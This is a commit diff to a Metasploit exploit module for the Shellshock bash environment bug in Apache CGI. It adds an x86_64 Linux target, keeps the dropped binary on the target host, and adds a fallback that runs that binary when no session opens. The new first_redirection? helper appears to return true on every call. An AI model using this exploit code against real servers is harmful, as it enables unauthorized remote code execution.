Make it more generic, add X86_64 target

2014-09-25 15:54:20 -05:00 · 2014-09-25 15:54:20 -05:00 · 9245bedf58
parent d8c03d612e
commit 9245bedf58
1 changed files with 30 additions and 3 deletions
--- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@ -6,6 +6,7 @@
 require 'msf/core'

 class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
@ -41,6 +42,13 @@ class Metasploit4 < Msf::Exploit::Remote
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
          ]
        ],
      'DefaultTarget' => 0,
@ -52,7 +60,7 @@ class Metasploit4 < Msf::Exploit::Remote
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
-      OptString.new('RPATH', [true, 'Target PATH for binaries uses by the CmdStager', '/bin']),
+      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end
@ -74,12 +82,22 @@ class Metasploit4 < Msf::Exploit::Remote
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

-    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'])
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
+
+    # A last chance after the cmdstager
+    # Trying to make it generic
+    unless session_created?
+      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
+    end
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
-    cmd.gsub!('rm', "#{datastore['RPATH']}/rm")
+
+    if cmd =~ />>/ && first_redirection?
+      cmd.sub!('>>', '>')
+    end
+
    req(cmd)
  end

@ -95,4 +113,13 @@ class Metasploit4 < Msf::Exploit::Remote
  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
+
+  def first_redirection?
+    unless @first_redirection && @first_redirection == false
+      @first_redirection = false
+      return true
+    end
+
+    false
+  end
 end